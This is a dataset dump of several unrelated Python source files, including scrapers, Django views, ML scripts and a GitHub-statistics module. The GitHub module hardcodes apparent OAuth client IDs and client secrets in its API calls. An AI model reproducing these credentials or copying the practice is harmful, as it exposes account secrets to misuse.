restrict_xpaths=('//div[@id=\"Blog1\"]//div[contains(@class, \"blog-posts\")]', ),\n unique=True,\n ),\n callback='parse_post_detail',\n ),\n )\n\n def parse_post_detail(self, response):\n \"\"\"\n Scrapy creates scrapy.http.Request objects for each URL in the\n start_urls attribute of the Spider, and assigns them the parse method\n of the spider as their callback function.\n \"\"\"\n\n hxs = HtmlXPathSelector(response)\n\n item = HeelsItem()\n\n item['comment'] = hxs.select('//title/text()').extract()\n item['image_urls'] = hxs.select('//div[contains(@class, \"post\")]//div[contains(@class, \"post-body\")]//img/@src').extract()\n item['source_url'] = response.url\n\n return item\n","sub_path":"blackwidow/spiders/sayhellomax.py","file_name":"sayhellomax.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"497545382","text":"import sys\nimport os\nsys.path.append('../')\nfrom Unet.data_Keras import Augmentation, DataProcess\n\nmydata = DataProcess(512, 1024)\nmydata.write_img_to_tfrecords()\naug = Augmentation()\naug.augmentation()\naug.split_merge()\nos.system('python3 unet-TF-withBatchNormal.py')\n","sub_path":"Unet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134690975","text":"import requests\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport codecs\r\nfrom openpyxl import Workbook\r\n\r\n# 从美团API中获取城市url\r\ndef get_url_from_api(city_name):\r\n url = \"https://apimobile.meituan.com/group/v1/area/search/\"\r\n res = requests.get(url + city_name).text\r\n res = json.loads(res)\r\n if len(res['data']) == 0:\r\n return 0\r\n else:\r\n acronym = res['data'][0]['cityAcronym']\r\n if len(acronym) == 0:\r\n return 0\r\n else:\r\n return [('https://' + acronym + '.meituan.com/meishi/'), city_name]\r\n\r\n# 从本地json文件从获取城市url\r\ndef get_url_from_json(city_name):\r\n if 
os.path.exists('city.json') == True:\r\n file = open('city.json', 'r').read()\r\n city_json = json.loads(file)\r\n if city_json.__contains__(city_name):\r\n return [city_json[city_name], city_name]\r\n else:\r\n return 0\r\n else:\r\n return 0\r\n\r\n# 获取商圈数据\r\ndef get_area_data(url):\r\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'}\r\n html = requests.get(url[0], headers=headers).text\r\n if len(html) == 0:\r\n print('未找到该城市的商圈信息')\r\n return 0\r\n else:\r\n html = BeautifulSoup(html, \"html.parser\").find_all('script')\r\n city_json = '' # 存放包含商圈信息的json字符串\r\n for i in html:\r\n i = str(i.string)\r\n if i.find('window._appState') != -1:\r\n city_json = i\r\n break\r\n city_json = city_json[19:-1] # 去除首位不需要的字符,仅保留json数据\r\n city_json = json.loads(city_json)\r\n city_json = city_json['filters']['areas']\r\n return [city_json, url[1]]\r\n\r\n# 处理数据 json=>txt\r\ndef process_data(data):\r\n res = \"\"\r\n for key, i in enumerate(data[0]):\r\n res += i['name'] + \"\\n\"\r\n for j in data[0][key]['subAreas']:\r\n if j['name'] != '全部':\r\n res += data[1] + j['name'] + \"\\n\"\r\n return res\r\n\r\n\r\ndef init():\r\n city = codecs.open('city_area.txt', 'r', 'UTF-8')\r\n while True:\r\n city_name = city.readline().strip()\r\n if not city_name:\r\n city.close()\r\n break\r\n # city_name = city_line\r\n url = get_url_from_json(city_name)\r\n if url == 0:\r\n url = get_url_from_api(city_name)\r\n if url == 0:\r\n print(\"输入的城市名有误,请重新输入\")\r\n init()\r\n data = get_area_data(url)\r\n if data != 0:\r\n data = process_data(data)\r\n print(data)\r\n file = open('city_area_' + city_name + '.txt', 'w', encoding='UTF-8')\r\n file.write(data)\r\n file.close()\r\n f = codecs.open('city_area_' + city_name + '.txt', 'r', 'UTF-8')\r\n i = 0\r\n\r\n wb = Workbook()\r\n sheet = wb.active\r\n sheet.title = \"trade_area\"\r\n\r\n def get_location(address, i):\r\n print(i)\r\n url = \"http://restapi.amap.com/v3/geocode/geo\"\r\n data = {\r\n 'key': 'xxxx', # 在高德地图开发者平台申请的key,需要替换为自己的key\r\n 'address': address\r\n }\r\n r = requests.post(url, data=data).json()\r\n sheet[\"A{0}\".format(i)].value = address.strip('\\n')\r\n print(r)\r\n if r['status'] == '1':\r\n if len(r['geocodes']) > 0:\r\n GPS = r['geocodes'][0]['location']\r\n sheet[\"B{0}\".format(i)].value = '[' + GPS + ']'\r\n else:\r\n sheet[\"B{0}\".format(i)].value = '[]'\r\n else:\r\n sheet[\"B{0}\".format(i)].value = '未找到'\r\n # 将地址信息替换为自己的文件,一行代表一个地址,根据需要也可以自定义分隔符\r\n\r\n while True:\r\n line = f.readline()\r\n i = i + 1\r\n if not line:\r\n f.close()\r\n wb.save('city_area_gps_' + city_name + '.xlsx')\r\n break\r\n get_location(line, i)\r\n\r\nif __name__ == '__main__':\r\n init()\r\n\r\n","sub_path":".py/get_trade_area_and_gps.py","file_name":"get_trade_area_and_gps.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"478739377","text":"\"\"\"\n\npython3 store.py\nThe Dugout\n 1. Running\n 2. Baseball\n 3. Basketball\n 4. 
Exit\nSelect the number of a department\n\nAttributes:\n-name\n-departments\n\nOptional Extra Attributes:\n-Store hours\n-Store Capacity\n\"\"\"\n\nfrom departments import Department\n\nclass Store:\n # hours = 12\n\n def __init__(self, name, departments):\n self.name = name\n self.departments = []\n\n for dep in departments:\n department = Department(dep)\n self.departments.append(department)\n\n # def __str__(self): #String is for readability\n # return f'Store name is {self.name}'\n\n # def __repr__(self): #representation is for testing/debugging\n # return f'Store name is {self.name}'\n\n def __str__(self):\n output = \"\"\n\n for index, department in enumerate(self.departments):\n output += str(index + 1) + \". \" + str(department) +\"\\n\"\n \n output += str(len(self.departments) + 1) + \". Exit\"\n \n return output\n\n\n\n\nstore = Store(\"The Dugout\", [\"Running\", \"Basketball\", \"Baseball\", \"Fencing\"])\n\nprint(store)\n\nselection = 0\n\nwhile selection != len(store.departments) + 1:\n selection = input(\"Select a number of a department. \")\n try:\n selection = int(selection)\n if selection >= 1 and selection < len(store.departments) + 1:\n print(f\"the user selected: {selection}\")\n else:\n print(\"Choose from the given choices\")\n except ValueError:\n print(f\"Choose a number\")\n\nprint(f\"Thank You for Shopping with Us Today :)\")","sub_path":"src/stores.py","file_name":"stores.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"421381852","text":"import numpy as np\nimport cv2\nimport random\n\n\nimg = cv2.imread(r'C:\\Users\\varun\\Coding\\python_practice\\Project_pie\\template.png',1)\n# Image is as a numpy array\n\n# Image has to be grayscale for cv2.threshold()\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nret, img_modified = cv2.threshold(img, 120, 255, cv2.THRESH_TOZERO) \ncv2.imshow('hello',img_modified)\n\n# Getting shape of image\nh, w = img.shape\n\nprint(\"Max number of random pixel sampling =\",h*w)\nprint(\"Give number of test cases(<10000) and number of random pixel sampling.\")\nn, iterations = [int(x) for x in input().split(' ')]\n\nprint(\"---- Ok wait ----\")\n# Gets the black pixel ratio for the 100 test cases \niteration_list = []\n\n# Keeps track of different colours\ncolour_list = {}\n\n# Makes sure no repeatation of pixel co=ordinates(in the inner samples)\ncheck_list = []\n\n# Count of black and white pixel in the random sampling\n\n# # 100 test cases\n# for _ in range(n) :\n \n# # Getting \"iteration\" number of pixels\n# for i in range(iterations):\n# # Random pixel values\n# x = random.randint(0,h-1)\n# y = random.randint(0,w-1)\n\n# # Ensuring no repeatation of pixels\n# if [x,y] not in check_list : \n# if img[x,y] == 0 :\n \n# else :\n \n\n# else :\n# i -= 1\n\n# # Appending black pixel to total value to the list\n# ratio_black = float(\"{:.5f}\".format(count_black/(count_black+count_white)))\n# iteration_list.append(ratio_black)\n \n# # Final calculations\n# mean_ratio_black = sum(iteration_list)/n\n# print(\"Percentage of black : %0.5f\"%(mean_ratio_black*100))\n# print(\"Total black pixel : %d/%d\"%(mean_ratio_black*(h*w),(h*w)))","sub_path":"Project_pie/Monte_Carlo_colour.py","file_name":"Monte_Carlo_colour.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"452405953","text":"from django.views.generic import ListView, DetailView\nfrom 
django.http import Http404\nfrom django.shortcuts import render, get_object_or_404\n\nfrom .models import Damage\nfrom .forms import DamageForm\n\n# ----------------- list view ------------------------\n\ndef damage_list_view(request):\n queryset = Damage.objects.all()\n context = {\n 'title': ' Damages',\n 'object_list': queryset\n }\n return render(request, \"damages/list.html\", context)\n\n\n# ---------------- detail View ---------------------------\n\ndef damage_detail_view(request, pk=None, *args, **kwargs):\n instance = Damage.objects.get_by_id(pk)\n if instance is None:\n raise Http404(\"Damage does not Exsist!\")\n context = {\n 'title': 'Damage Details',\n 'object': instance\n }\n return render(request, \"damages/detail.html\", context)\n\n # --------------- Create damage ---------------------------\ndef damage_create_view(request):\n form = DamageForm(request.POST or None)\n if form.is_valid():\n form.save()\n form = DamageForm()\n\n context = {\n 'form' : form,\n }\n return render(request, 'damages/damage-new.html', context)","sub_path":"damages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"582084842","text":"# picturing\r\n# ABANDONDED.\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport glob\r\nimport math\r\nimport matplotlib as mpl\r\nfrom matplotlib.font_manager import FontProperties\r\nzhfont = FontProperties(fname=\"/usr/share/fonts/cjkuni-ukai/ukai.ttc\") # 图片显示中文字体\r\nmpl.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport pickle\r\n\r\nfrom toolkitJ import cell2dmatlab_jsp\r\nwith open('res.pickle', 'rb') as f:\r\n res = pickle.load(f)\r\n\r\nprint(res)\r\n\r\nprint(len(res))\r\n#\r\nL = len(res)\r\n\r\nft_size = 24\r\n\r\n\r\nxlbl = cell2dmatlab_jsp([L], 1, [])\r\ny = np.zeros((6, L))\r\nfor i in range(L):\r\n xlbl[i] = res[i][1]\r\n for j in range(6):\r\n y[j][i] = res[i][3][j]\r\n\r\nxlbl = ['LSVM', 'LDA', 'QDA', 'NB', 'ADAB', 'LRC', 'DT', 'RF']\r\nylbl = ['P(Precision)', 'A(Accuracy)', 'R(Recall)', 'MA(Missing Alert)', 'FA(False Alert)', 'F1(F1 score)']\r\nx = np.arange(1, 9)\r\nh = plt.figure(num=str(j), figsize=(17, 9.3))\r\nax = plt.gca()\r\nport = 0.1\r\nytick = np.arange(0, 1, 0.2)\r\ncolorlist = ['blue', 'green', 'yellow', 'yellowgreen', 'purple', 'red']\r\nfor j in range(6):\r\n # plt.subplot(3, 2, j + 1)\r\n delt = port * j + 0.01 * j\r\n plt.bar(x - 0.3 + delt, y[j], width=port, facecolor=colorlist[j], label=ylbl[j])\r\n\r\n plt.legend(mode=\"expand\", loc=2, fontsize=ft_size)\r\n ax.set_xticks(x)\r\n ax.set_xticklabels(xlbl, fontproperties=zhfont, fontsize=ft_size)\r\n ax.set_yticklabels(ytick, fontsize=ft_size)\r\n # plt.xlabel('Classifiers')\r\n plt.ylabel('scores', fontsize=ft_size)\r\n # plt.title(ylbl[j])\r\n plt.ylim((0, 1))\r\n plt.show()\r\n plt.savefig('/home/GaoMY/EXECUTION/NFDA/code/python_backup/pic/e.png')\r\n\r\n\r\nh2 = plt.figure(num=str(j), figsize=(17, 9.3))\r\n\r\n\r\nfor j in range(6):\r\n plt.subplot(3, 2, j + 1)\r\n ax = plt.gca()\r\n plt.bar(x, y[j], label=ylbl[j])\r\n plt.legend(loc='best')\r\n ax.set_xticks(x)\r\n if j > 3:\r\n ax.set_xticklabels(xlbl, fontproperties=zhfont, fontsize=ft_size)\r\n else:\r\n ax.set_xticklabels([], fontproperties=zhfont, fontsize=ft_size)\r\n\r\n ax.set_yticklabels(ytick, fontsize=ft_size)\r\n # plt.xlabel('Classifiers')\r\n plt.ylabel('scores', fontsize=ft_size)\r\n plt.title(ylbl[j], fontsize=ft_size)\r\n plt.ylim((0, 1))\r\n plt.show()\r\n 
plt.savefig('/home/GaoMY/EXECUTION/NFDA/code/python_backup/pic/SPR.png')\r\n","sub_path":"WORKFLOW/code/python_code/picturing.py","file_name":"picturing.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"591793228","text":"import os\r\nimport numpy as np\r\nimport xml.etree.ElementTree as ET\r\npath = r\"/media/shuhao/harddisk1/data/Annotations/train/\"\r\n\r\nfiles = os.listdir(path)\r\nnum=0\r\nfor xml in files:\r\n xml_path=path+xml\r\n print(xml_path)\r\n tree = ET.parse(xml_path)\r\n root = tree.getroot()\r\n objects = root.findall('object')\r\n for object in objects:\r\n object_name = object.find('name').text\r\n if object_name=='\\\\':\r\n object.find('name').text='ggp'\r\n num += 1\r\n print(xml_path)\r\n tree.write(xml_path)\r\nprint(num)","sub_path":"data_tools/xml替换.py","file_name":"xml替换.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"18369560","text":"__author__ = 'briansmith'\n\n#!/usr/bin/env python\n\nimport argparse, textwrap\n\nparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n description = textwrap.dedent('''\\\n Author: Brian A. Smith\n University of Arizona\n basmith@email.arizona.edu\n\n\t\t\t\t This script will replace protein ID with a count ID'''))\nparser.add_argument(\"-i\", \"--input\", required = True,\n\t\t help = \"FASTA Amino Acids file required\")\nparser.add_argument(\"-o\", \"--output\", required = True,\n\t\t help = \"Desierd output file name\")\n\nargs = parser.parse_args()\n\nfile = open(args.input, 'r')\nout_file = open(args.output, 'w')\n\nline_count = 1\nfor line in file.readlines():\n\tif line.startswith(\">\"):\n\t\tline = \">\" + str(line_count)+\"\\n\"\n\t\tout_file.write(line)\n\t\tline_count += 1\n\telif not line.startswith(\">\"):\n\t\tout_file.write(line)\nfile.close()\n","sub_path":"mod_protein_id.py","file_name":"mod_protein_id.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"347582478","text":"import numpy as np\n\ndef Judger(dices):\n p1 = 0 \n p2 = 1\n draw = 2\n player1 = [dices[0], dices[1]]\n player2 = [dices[2], dices[3]]\n \n if(player1[0] == player1[1] and player2[0] == player2[1]):\n if(player1[0] == player2[0]):\n return draw\n elif(player1[0] > player2[0]):\n return p1\n else:\n return p2\n elif(player1[0] == player1[1]):\n return p1\n elif(player2[0] == player2[1]):\n return p2\n elif(np.sum(player1) == np.sum(player2)):\n return draw\n elif(np.sum(player1) > np.sum(player2)):\n return p1\n else:\n return p2 \na = 1\n\nc = 3\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"51600142","text":"from Jumpscale import j\n\n\nclass Package(j.baseclasses.threebot_package):\n def start(self):\n self.openresty.install()\n self.openresty.configure()\n\n for port in (443, 80):\n website = self.openresty.get_from_port(port)\n locations = website.locations.get(name=f\"admin_{port}\")\n\n admin_location = locations.get_location_static(\"admin\")\n admin_location.path_url = \"/admin\"\n admin_location.path_location = f\"{self._dirpath}/output\"\n admin_location.is_auth = 
True\n","sub_path":"ThreeBotPackages/zerobot/admin/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"111569148","text":"import pandas as pd\nfrom xgboost.sklearn import XGBClassifier\nimport operator\nimport numpy as np\nimport pickle\n\ntrain=np.loadtxt(\"train_stage2.csv\")\ntest=np.loadtxt(\"pred_stage2.csv\")\ntarget=pd.read_csv('target.csv',index_col=0)\nsubmission=pd.read_csv('SubmissionFormat.csv')\n\nest=XGBClassifier(max_depth=7,\n \tlearning_rate= 0.02358,\n \tn_estimators=189,\n \tgamma=0.07479,\n \tmin_child_weight=3.0666,\n \tsubsample=0.4970,\n \tcolsample_bytree=0.9517,\n \treg_alpha=0.2065,\n \tobjective='multi:softmax')\n\n\n\nest.fit(train,target['status_group'])\npath = 'save/est.pickle'\nfile = open(path,'wb')\npickle.dump(est,file)\npred=est.predict(test)\nimportances = est.booster().get_fscore()\nsorted_imp = sorted(importances.items(), key=operator.itemgetter(1))\n\noutput=np.chararray(len(pred), itemsize=30)\noutput[pred==0]='functional'\noutput[pred==1]='functional needs repair'\noutput[pred==2]='non functional'\n\n\nsubmission['status_group']=output\nsubmission.to_csv('output.csv',index=False)\n \n","sub_path":"final/src/experiment_code/liang_code/model2_code/train/Blending.py","file_name":"Blending.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440925390","text":"import json\n\nimport requests\nimport resume_yandex.betterapi as ba\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nfrom resume_yandex import models\nfrom resume_yandex.models import GithubConnectedUsers, ProfileFullInfo, LangsInfo, EventsInfo, \\\n CommitsInfo, StarInfo, GithubSwiftInfo\n\n\ndef get_access_token(code, request):\n data = {'client_id': '89ba7814659aa83af19e',\n 'client_secret': '209e2c94999ee8de25628ab1f840f6566d546303',\n 'code': code, 'redirect_uri': 'https://resumecreator.ru/user/get_info/github'}\n r = requests.post(\n 'https://github.com/login/oauth/access_token', json=data)\n tmp = r.text\n if 'access_token' in tmp:\n get_info(tmp[13:53], request)\n\n\ndef get_swift_stats(request):\n ourid = User.objects.filter(username=request.GET['login']).values().first()['id']\n username = models.GithubConnectedUsers.objects.filter(authorid=ourid).values().first()[\n 'github_username']\n\n a = ba.get_user_events(username)\n repos_name = []\n\n data = []\n client_id_and_secret = \"?client_id=ea92b1a1958dd3d3e965&client_secret=2ee1ba9e4052deae4c79ba5c2b43cc0cadda2636\"\n url_tmp = \"https://api.github.com/users/\" + username + \"/repos\" + client_id_and_secret\n if len(GithubSwiftInfo.objects.filter(username=username).values()) > 0:\n repos_dict_with_full_info = json.loads(GithubSwiftInfo.objects.filter(username=username).values()[0]['data'])\n else:\n repos_json = (requests.get(url_tmp)).json()\n repos_count = len(repos_json)\n\n repos_dict_with_full_info = []\n\n for repo in repos_json:\n try:\n contributors_json = (\n requests.get('https://api.github.com/repos/' + username + '/' + repo[\n 'name'] + '/contributors' + client_id_and_secret)).json()\n repo_info_json = (\n requests.get(\n 'https://api.github.com/repos/' + username + '/' + repo[\n 'name'] + client_id_and_secret)).json()\n\n try:\n my_dict = {'name': repo['name'], 'language': repo_info_json['language'],\n 'commits': contributors_json[0]['contributions'],\n 'stars': 
repo_info_json['stargazers_count']}\n\n repos_dict_with_full_info.append(my_dict)\n except:\n pass\n except:\n pass\n obj = GithubSwiftInfo.objects.create(username=username,\n data=json.dumps(repos_dict_with_full_info),\n )\n obj.save()\n#\n copy_repos_dict_with_full_info = repos_dict_with_full_info\n\n count = 0\n for i in copy_repos_dict_with_full_info:\n count += 1\n if count > 5:\n break\n repos_name.append(i['name'][:6])\n data.append(i['commits'])\n\n langs = []\n stars = []\n langs_commit = []\n star_counter = 0\n commits_counter = 0\n languages_counter = 0\n langs_arr_counter = []\n repos_counter = 0\n most_popular_langs_in_git = [\"Javascript\", \"Python\", \"Java\", \"Ruby\", \"Php\", \"C++\", \"CSS\", \"C#\",\n \"Go\", \"C\"]\n our_popular = []\n our_not_popular = []\n\n for i in copy_repos_dict_with_full_info:\n repos_counter += 1\n if str(i['stars']) != '0':\n if i['language'] in langs:\n stars[langs.index(i['language'])] += int(i['stars'])\n else:\n langs_arr_counter.append(str(i['language']))\n languages_counter += 1\n\n langs.append(str(i['language']))\n langs_commit.append(0)\n stars.append(int(i['stars']))\n star_counter += int(i['stars'])\n commits_counter += int(i['commits'])\n if str(i['language']) in most_popular_langs_in_git:\n if str(i['language']) not in our_popular:\n our_popular.append(str(i['language']))\n else:\n if str(i['language']) not in our_not_popular:\n if str(i['language']) != 'None' and str(i['language']) != 'null' and str(i['language']) != 'HTML':\n our_not_popular.append(str(i['language']))\n\n for i in copy_repos_dict_with_full_info:\n for j in range(0, len(langs)):\n if i['language'] == langs[j]:\n langs_commit[j] += int(i['commits'])\n\n return JsonResponse(\n [repos_name, data, [\"lol\"], langs, stars, langs_commit, a[0], a[1], [str(star_counter)],\n [str(commits_counter)], [str(languages_counter)], [str(repos_counter)], our_popular,\n our_not_popular, langs_arr_counter], safe=False)\n\n\ndef test_for_swift_app(request):\n \"\"\" function for test_for_swift_app.\n \"\"\"\n login_from_app = request.GET['login']\n pass_from_app = request.GET['pass']\n\n this = User.objects.get(username=login_from_app)\n\n if this.check_password(pass_from_app):\n tmp = models.GithubConnectedUsers.objects.filter(authorid=this.id).values()\n\n return JsonResponse(list(tmp)[0], safe=False)\n return JsonResponse({'id': 'false'}, safe=False)\n\n\ndef get_info(access_token, request):\n repos = requests.get('https://api.github.com/user/repos?access_token=' + access_token).text\n user_info = requests.get('https://api.github.com/user?access_token=' + access_token)\n # (access_token)\n user_info = user_info.json()\n for key in user_info:\n if user_info[key] is None:\n user_info[key] = 'None'\n try:\n name = user_info['name']\n except KeyError:\n name = user_info['login']\n try:\n obj = GithubConnectedUsers.objects.filter(authorid=request.user.id).update(\n authorid=request.user.id,\n fullname=name,\n avatarurl=user_info['avatar_url'],\n orgs=requests.get(\n 'https://api.github.com/user/orgs?access_token=' + access_token),\n followers=user_info['followers'],\n repos_dict_with_full_info=repos,\n moreprofinfo=json.dumps(\n {'company': user_info['company'],\n 'location': user_info[\n 'location'],\n 'email': user_info['email'],\n 'bio': user_info['bio']}),\n access_token=access_token,\n github_username=user_info['login'],\n )\n GithubConnectedUsers.objects.filter(github_username=user_info['login']).update(\n access_token=access_token)\n if obj == 0:\n raise IndexError\n 
ProfileFullInfo.objects.filter(authorid=request.user.id).update(fullname=name,\n company=user_info[\n 'company'],\n address=user_info[\n 'location'],\n email=user_info['email'],\n about=user_info['bio'])\n LangsInfo.objects.filter(github=user_info['login']).update(flag=0)\n EventsInfo.objects.filter(github=user_info['login']).update(flag=0)\n CommitsInfo.objects.filter(github=user_info['login']).update(flag=0)\n StarInfo.objects.filter(github=user_info['login']).update(flag=0)\n except IndexError:\n obj = GithubConnectedUsers.objects.create(authorid=request.user.id,\n fullname=name,\n avatarurl=user_info['avatar_url'],\n orgs=requests.get(\n 'https://api.github.com/user/orgs?access_token=' + access_token),\n followers=user_info['followers'],\n repos_dict_with_full_info=repos,\n moreprofinfo=json.dumps(\n {'company': user_info['company'],\n 'location': user_info['location'],\n 'email': user_info['email'],\n 'bio': user_info['bio']}),\n access_token=access_token,\n github_username=user_info['login'],\n )\n obj.save()\n ProfileFullInfo.objects.filter(authorid=request.user.id).update(fullname=name,\n company=user_info[\n 'company'],\n address=user_info[\n 'location'],\n email=user_info[\n 'email'],\n about=user_info[\n 'bio'])\n","sub_path":"resume_project/resume_yandex/githubAPI.py","file_name":"githubAPI.py","file_ext":"py","file_size_in_byte":9615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"267601658","text":"from django import forms\nfrom member.models import Package\nimport selectable\nfrom lookups import *\n\n\nclass PackageSearchForm(forms.Form):\n\t# search = selectable.forms.AutoCompleteWidget(PackageLookup, label='', required=False)\n\tautocomplete = forms.CharField(\n label='',\n widget=selectable.forms.AutoCompleteWidget(PackageLookup, attrs={\"class\": \"input\", \"placeholders\":\"Enter your prefered number\"}),\n required=False,\n\n )\n\nclass FilterTwilioNumberSearchForm(forms.Form):\n\tarea_code = forms.CharField(max_length=3, \n required=False, \n label=\"Area Code\",\n widget=forms.TextInput(attrs={\"class\": \"input\"}))\n\n\tcountry = forms.CharField(max_length=3, \n required=False, \n label=\"Country\",\n widget=forms.TextInput(attrs={\"class\": \"input\"}))\n\t# sms_enabled = forms.BooleanField()\n\t# mms_enabled = forms.BooleanField()\n\t# voice_enabled = forms.BooleanField()","sub_path":"mytwilio/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"311650394","text":"\"\"\"\nA random player selects moves randomly.\n\nLast update: 25 NOV 2018\n\"\"\"\nimport isolation\nimport random\n\n\nclass RandomPlayer(isolation.Player):\n \"\"\"\n A random player selects moves at random\n \"\"\"\n\n def __init__(self, name, token):\n \"\"\"\n Initialize this player\n :param name: This player's name\n :param token: This player's token\n \"\"\"\n super().__init__(name, token)\n\n def take_turn(self, board):\n \"\"\"\n Make a move on the isolation board\n :param board: an Board object\n :return: Return a Move object\n \"\"\"\n\n print(\"\\n{} taking turn: \".format(self._name), end='')\n\n # Collect board state info to generate a move from\n space_id = board.token_location(self._token)\n neighbors = board.neighbor_tiles(space_id)\n print('possible moves:', neighbors)\n tiled_spaces = board.push_outable_square_ids()\n\n # Select a square to move to and a tile to push out.\n # Once a neighbor square is 
chosen to move to,\n # that square can no longer be pushed out, but\n # the square vacated might be able to be pushed out\n to_space_id = random.choice(list(neighbors))\n tiled_spaces.discard(to_space_id)\n # if space_id not in board.start_squares():\n # tiled_spaces.add(space_id)\n tiled_spaces.add(space_id)\n print('possible push outs:', tiled_spaces)\n push_out_space_id = random.choice(list(tiled_spaces))\n\n # print(' Moving to', to_space_id, 'and pushing out', push_out_space_id)\n\n move = isolation.Move(to_space_id, push_out_space_id)\n print(' ', move)\n return move\n\n\nif __name__ == '__main__':\n # Create a match\n isolation.Board.set_dimensions(6, 8)\n match = isolation.Match(RandomPlayer('Blue', isolation.Board.BLUE_TOKEN),\n RandomPlayer('Red', isolation.Board.RED_TOKEN),\n isolation.Board())\n match.start_play()\n\n # # Play 100 more matches\n # for i in range(100):\n # match = isolation.Match(RandomPlayer('Blue', isolation.Board.BLUE_TOKEN),\n # RandomPlayer('Red', isolation.Board.RED_TOKEN))\n # print(match.start_play())\n # print('*' * 40)\n","sub_path":"Code/randomplayer.py","file_name":"randomplayer.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"585233616","text":"# -*- coding: utf-8 -*-\n\n'''\n通过pandas将csv写入mysql\n文档:http://pandas.pydata.org/pandas-docs/stable/io.html#sql-queries\n'''\n\n\nfrom glob import glob\nimport os.path\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\n# 连接数据库\nengine = create_engine('mysql+pymysql://root:root@localhost:3306/movies3')\n\n\ndef csv_to_mysql(path):\n df = pd.read_csv(path, sep=',')\n file_name = os.path.splitext(os.path.split(path)[1])[0]\n # 将新建的DataFrame储存为MySQL中的数据表,不储存index列\n df.to_sql(file_name, engine, chunksize=1000,\n if_exists='replace', index=False)\n print(\"Write {} to MySQL successfully!\".format(file_name))\n\n\nif __name__ == '__main__':\n csv_files = glob('ml-20m/*.csv')\n for path in csv_files:\n csv_to_mysql(path)\n","sub_path":"sql/pd_to_sql.py","file_name":"pd_to_sql.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"432967036","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom base_app.classes.debug import Debug\nfrom base_app.models.mongodb.base_model import MongodbModel\n\n__author__ = 'Morteza'\n\n\nclass NewsComparativeQueueModel:\n def __init__(self):\n pass\n\n @staticmethod\n def get_all(agency=None, _code=None):\n try:\n __body = {\"code\": _code}\n if agency is not None:\n __body = {\"agency\": agency}\n r = MongodbModel(collection='news_comparative_queue', body=__body).get_all()\n result = [i for i in r]\n return result\n except:\n Debug.get_exception(sub_system='admin', severity='error', tags='mongodb > get_all', data='collection > news_queue')\n return False\n\n @staticmethod\n def update_code(_id, _code):\n try:\n __body = {\"$set\": {\n \"code\": _code\n }}\n __condition = {\"_id\": _id}\n return MongodbModel(collection='news_comparative_queue', body=__body, condition=__condition).update()\n except:\n Debug.get_exception(sub_system='admin', severity='error', tags='mongodb > get_all', data='collection > news_queue')\n return False\n\n @staticmethod\n def delete_code(_code):\n try:\n __body = {\"$set\": {\n \"code\": -1\n }}\n __condition = {\"code\": _code}\n __option = {\"multi\": True}\n return MongodbModel(collection='news_comparative_queue', body=__body, 
condition=__condition, option=__option).update_option()\n except:\n Debug.get_exception(sub_system='admin', severity='error', tags='mongodb > get_all', data='collection > news_queue')\n return False\n","sub_path":"base_app/models/mongodb/news_comparative_queue/news_comparative_queue.py","file_name":"news_comparative_queue.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"120660120","text":"#No this has nothing to do with pwlib\r\n#It's a way to get version information from archives and folders\r\nimport os\r\n\r\ndef cver(verstr):\r\n \"\"\"Converts a version string into a number\"\"\"\r\n if verstr.startswith(\"b\"):\r\n return float(verstr[1:])-100000\r\n return float(verstr)\r\n \r\ndef cver_t(verstr):\r\n \"\"\"Converts a version string into a tuple\"\"\"\r\n if verstr.startswith(\"b\"):\r\n return tuple([0,0,0,0]+list(cver_t(verstr[1:])))\r\n return tuple([int(x) for x in verstr.split(\".\")])\r\n \r\ndef 